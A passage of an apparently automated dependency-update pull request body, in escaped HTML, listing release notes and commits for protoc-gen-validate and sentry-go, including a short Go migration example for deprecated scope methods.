href=\"https://github.com/bufbuild/protoc-gen-validate/compare/v1.3.2...v1.3.3\"\u003ehttps://github.com/bufbuild/protoc-gen-validate/compare/v1.3.2...v1.3.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.3.2\u003c/h2\u003e\n\u003cp\u003eFixing the \u003ccode\u003ev1.3.1\u003c/code\u003e release, which was fixing the \u003ccode\u003ev1.3.0\u003c/code\u003e release 😄.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAttempt to fix release by \u003ca href=\"https://github.com/stefanvanburen\"\u003e\u003ccode\u003e@​stefanvanburen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1368\"\u003ebufbuild/protoc-gen-validate#1368\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/compare/v1.3.1...v1.3.2\"\u003ehttps://github.com/bufbuild/protoc-gen-validate/compare/v1.3.1...v1.3.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.3.1\u003c/h2\u003e\n\u003cp\u003eThis is a release to get out \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/issues/1333\"\u003ePython support for 3.13\u003c/a\u003e, which failed to publish to PyPI in \u003ccode\u003ev1.3.0\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump the java group across 1 directory with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1332\"\u003ebufbuild/protoc-gen-validate#1332\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/checkout from 5 to 6 in the github-actions group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1330\"\u003ebufbuild/protoc-gen-validate#1330\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix Java deployment by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1335\"\u003ebufbuild/protoc-gen-validate#1335\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate settings.xml to use SONATYPE_USERNAME env var by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1336\"\u003ebufbuild/protoc-gen-validate#1336\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRun deployment with release profile by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1337\"\u003ebufbuild/protoc-gen-validate#1337\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove maven settings.xml file by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1338\"\u003ebufbuild/protoc-gen-validate#1338\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group in /java with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1334\"\u003ebufbuild/protoc-gen-validate#1334\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the github-actions group with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1341\"\u003ebufbuild/protoc-gen-validate#1341\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group in /java with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1340\"\u003ebufbuild/protoc-gen-validate#1340\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the go-tests group in /tests with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1339\"\u003ebufbuild/protoc-gen-validate#1339\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group across 1 directory with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1343\"\u003ebufbuild/protoc-gen-validate#1343\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport for latest setuptools by \u003ca href=\"https://github.com/matejsp\"\u003e\u003ccode\u003e@​matejsp\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1345\"\u003ebufbuild/protoc-gen-validate#1345\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReplace deprecated java_proto_library from rules_java by \u003ca href=\"https://github.com/mmorel-35\"\u003e\u003ccode\u003e@​mmorel-35\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1349\"\u003ebufbuild/protoc-gen-validate#1349\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/net from 0.48.0 to 0.49.0 in /tests in the go-tests group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1350\"\u003ebufbuild/protoc-gen-validate#1350\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group across 1 directory with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1351\"\u003ebufbuild/protoc-gen-validate#1351\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump wheel from 0.45.1 to 0.46.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1352\"\u003ebufbuild/protoc-gen-validate#1352\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate go and deps by \u003ca href=\"https://github.com/rodaine\"\u003e\u003ccode\u003e@​rodaine\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1355\"\u003ebufbuild/protoc-gen-validate#1355\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate python and deps by \u003ca href=\"https://github.com/rodaine\"\u003e\u003ccode\u003e@​rodaine\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1354\"\u003ebufbuild/protoc-gen-validate#1354\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group in /java with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1356\"\u003ebufbuild/protoc-gen-validate#1356\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-root group across 1 directory with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1357\"\u003ebufbuild/protoc-gen-validate#1357\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/compare/v1.3.0...v1.3.1\"\u003ehttps://github.com/bufbuild/protoc-gen-validate/compare/v1.3.0...v1.3.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.3.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate README.md by \u003ca href=\"https://github.com/nicksnyder\"\u003e\u003ccode\u003e@​nicksnyder\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1233\"\u003ebufbuild/protoc-gen-validate#1233\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix unreliable asset generation by \u003ca href=\"https://github.com/nicksnyder\"\u003e\u003ccode\u003e@​nicksnyder\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1235\"\u003ebufbuild/protoc-gen-validate#1235\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/92b9a7df69ca9f71bfc492f7a90adf4d36eab569\"\u003e\u003ccode\u003e92b9a7d\u003c/code\u003e\u003c/a\u003e Update Python 3.9 references to 3.10 (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1370\"\u003e#1370\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/e72f3dc29517fe8664e8f59680d0d48fa918df03\"\u003e\u003ccode\u003ee72f3dc\u003c/code\u003e\u003c/a\u003e Attempt to fix release (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1368\"\u003e#1368\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/39d950bc7aafa91a2e592dc3a7b4768a189f0af1\"\u003e\u003ccode\u003e39d950b\u003c/code\u003e\u003c/a\u003e Bump the python-root group across 1 directory with 4 updates (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1357\"\u003e#1357\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/c4c14142d65a4ba260d5f06fdd5e904f940c46a4\"\u003e\u003ccode\u003ec4c1414\u003c/code\u003e\u003c/a\u003e Bump the java group in /java with 2 updates (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1356\"\u003e#1356\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/05cc215303e1297497ab092d97647eb4fb9ceb1a\"\u003e\u003ccode\u003e05cc215\u003c/code\u003e\u003c/a\u003e Update python and deps (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1354\"\u003e#1354\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/1a76a21e21e50cbd1d42000baf3e8a285d6810dc\"\u003e\u003ccode\u003e1a76a21\u003c/code\u003e\u003c/a\u003e Update go and deps (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1355\"\u003e#1355\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/3212c98f3a0381ab8ca2f7c2ac733adbdae361da\"\u003e\u003ccode\u003e3212c98\u003c/code\u003e\u003c/a\u003e Bump wheel from 0.45.1 to 0.46.2 (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1352\"\u003e#1352\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/4231822c297f46ae238f7130e3d6f747a24b2005\"\u003e\u003ccode\u003e4231822\u003c/code\u003e\u003c/a\u003e Bump the java group across 1 directory with 4 updates (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1351\"\u003e#1351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/187ff66a4da4e35729d0946ae8eb24caf5168678\"\u003e\u003ccode\u003e187ff66\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/net from 0.48.0 to 0.49.0 in /tests in the go-tests group (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/ae40bad58381838eeb79628bfaf3d560f8a85a4a\"\u003e\u003ccode\u003eae40bad\u003c/code\u003e\u003c/a\u003e Replace deprecated java_proto_library from rules_java (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1349\"\u003e#1349\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/envoyproxy/protoc-gen-validate/compare/v1.2.1...v1.3.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/getsentry/sentry-go` from 0.34.1 to 0.44.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-go/releases\"\u003egithub.com/getsentry/sentry-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.44.1\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\u003cbr /\u003e\nv0.44.0 had to be released as v0.44.1 due to a technical issue.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eNew Features ✨\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd RemoveAttribute api on the scope. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eScope.SetExtra\u003c/code\u003e, \u003ccode\u003eScope.SetExtras\u003c/code\u003e, and \u003ccode\u003eScope.RemoveExtra\u003c/code\u003e in favor of \u003ccode\u003eScope.SetAttributes\u003c/code\u003e and \u003ccode\u003eScope.RemoveAttribute\u003c/code\u003e by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eThe recommended migration path is to use \u003ccode\u003eSetAttributes\u003c/code\u003e to attach values to logs and metrics. Note that attributes do not appear on error events; if you only capture errors, use \u003ccode\u003eSetTag\u003c/code\u003e or \u003ccode\u003eSetContext\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003eBefore:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetExtra(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\r\nscope.SetExtra(\u0026quot;key.int\u0026quot;, 42)\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for error events) — use tags and contexts:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetTag(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\r\nscope.SetContext(\u0026quot;my_data\u0026quot;, sentry.Context{\u0026quot;key.int\u0026quot;: 42})\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for logs and metrics) — use attributes:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetAttributes(\r\n    attribute.String(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;),\r\n    attribute.Int(\u0026quot;key.int\u0026quot;, 42),\r\n)\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003eAdd support for homogenous arrays by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1203\"\u003e#1203\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for client reports by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1192\"\u003e#1192\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd org id propagation in sentry_baggage by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd OrgID and StrictTraceContinuation client options. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd the option to set attributes on the scope by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1208\"\u003e#1208\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes 🐛\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(serialization) Pre-serialize mutable event fields to prevent race panics by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1214\"\u003e#1214\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse HEROKU_BUILD_COMMIT with HEROKU_SLUG_COMMIT as fallback by \u003ca href=\"https://github.com/ericapisani\"\u003e\u003ccode\u003e@​ericapisani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1220\"\u003e#1220\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal Changes 🔧\u003c/h3\u003e\n\u003ch4\u003eAi\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAdd AGENTS.md and testing guidelines by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1216\"\u003e#1216\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd dotagents configuration by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1211\"\u003e#1211\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDeps\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump github.com/buger/jsonparser from 1.1.1 to 1.1.2 in /zerolog by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1231\"\u003e#1231\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump github.com/gofiber/fiber/v2 from 2.52.11 to 2.52.12 in /fiber by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1209\"\u003e#1209\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eOther\u003c/h4\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-go/blob/master/CHANGELOG.md\"\u003egithub.com/getsentry/sentry-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.44.1\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\u003cbr /\u003e\nThe v0.44.0 is missing due to a technical issue and had to be released again as v0.44.1\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eNew Features ✨\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd RemoveAttribute api on the scope. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eScope.SetExtra\u003c/code\u003e, \u003ccode\u003eScope.SetExtras\u003c/code\u003e, and \u003ccode\u003eScope.RemoveExtra\u003c/code\u003e in favor of \u003ccode\u003eScope.SetAttributes\u003c/code\u003e and \u003ccode\u003eScope.RemoveAttribute\u003c/code\u003e by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eThe recommended migration path is to use \u003ccode\u003eSetAttributes\u003c/code\u003e to attach values to logs and metrics. Note that attributes do not appear on error events; if you only capture errors, use \u003ccode\u003eSetTag\u003c/code\u003e or \u003ccode\u003eSetContext\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003eBefore:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetExtra(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\nscope.SetExtra(\u0026quot;key.int\u0026quot;, 42)\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for error events) — use tags and contexts:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetTag(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\nscope.SetContext(\u0026quot;my_data\u0026quot;, sentry.Context{\u0026quot;key.int\u0026quot;: 42})\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for logs and metrics) — use attributes:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetAttributes(\n    attribute.String(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;),\n    attribute.Int(\u0026quot;key.int\u0026quot;, 42),\n)\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003eAdd support for homogenous arrays by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1203\"\u003e#1203\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for client reports by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1192\"\u003e#1192\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd org id propagation in sentry_baggage by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd OrgID and StrictTraceContinuation client options. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd the option to set attributes on the scope by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1208\"\u003e#1208\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes 🐛\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(serialization) Pre-serialize mutable event fields to prevent race panics by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1214\"\u003e#1214\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse HEROKU_BUILD_COMMIT with HEROKU_SLUG_COMMIT as fallback by \u003ca href=\"https://github.com/ericapisani\"\u003e\u003ccode\u003e@​ericapisani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1220\"\u003e#1220\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal Changes 🔧\u003c/h3\u003e\n\u003ch4\u003eAi\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAdd AGENTS.md and testing guidelines by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1216\"\u003e#1216\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd dotagents configuration by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1211\"\u003e#1211\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDeps\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump github.com/buger/jsonparser from 1.1.1 to 1.1.2 in /zerolog by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1231\"\u003e#1231\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump github.com/gofiber/fiber/v2 from 2.52.11 to 2.52.12 in /fiber by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1209\"\u003e#1209\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/16414f29918c1fb660d4792046f08224dfefc632\"\u003e\u003ccode\u003e16414f2\u003c/code\u003e\u003c/a\u003e release: 0.44.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/d26d3ecd4bceb8b900147c2e8faf993c1fdf8720\"\u003e\u003ccode\u003ed26d3ec\u003c/code\u003e\u003c/a\u003e ci: add preReleaseCommand for craft (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1232\"\u003e#1232\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/65538eb2c2b714f1aec781267612d97e4a4f8d94\"\u003e\u003ccode\u003e65538eb\u003c/code\u003e\u003c/a\u003e build(deps): bump github.com/buger/jsonparser in /zerolog (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1231\"\u003e#1231\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 